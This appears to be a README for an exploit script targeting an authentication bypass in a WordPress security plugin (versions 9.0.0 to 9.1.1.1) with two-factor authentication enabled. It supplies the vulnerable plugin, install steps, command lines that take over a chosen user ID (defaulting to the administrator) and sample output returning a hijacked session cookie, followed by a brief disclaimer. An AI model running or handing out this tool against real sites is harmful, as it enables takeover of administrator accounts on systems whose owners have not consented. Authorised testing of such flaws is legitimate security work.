An error handling flaw in the REST API of the Really Simple Plugins WordPress plugin (versions between 9.0.0 and 9.1.1.1 included) allows an attacker, when Two-Factor Authentication is enabled, to bypass authentication and take control of an existing user or administrator account.
As I'm a nice guy, you'll also find version 9.1.1.1 of the plugin. Just unzip and upload it in the wp-content/plugins folder. Don't forget to activate the plugin and enable 2FA.
Install the required dependencies using pip:
pip install -r requirements.txt- argparse: For parsing command-line arguments
- validator-collection: To validate the URL format.
- requests: To send HTTP POST requests.
- random: To generate a random nonce for the payload
python exploit.py [-id USER_ID] URL-
With a specific User ID:
python exploit.py -id 10 http://localhost:8886/
This sends the exploit payload with a user ID of
10. -
Without specifying User ID:
python exploit.py http://localhost
Defaults the User ID to
1.
Exploit successful.
--------------------------------------------------
session_id=xyz123; path=/; HttpOnly
--------------------------------------------------
Exploit failed. Maybe the target is not vulnerable or the user ID is incorrect.
- Use responsibly: This script is for educational and penetration testing purposes only.
- Authorization: Ensure you have explicit permission to test the target system.
- HTTPS: Disable SSL verification (
verify=False) only if necessary for testing.
IDK but I'm not responsible for anything.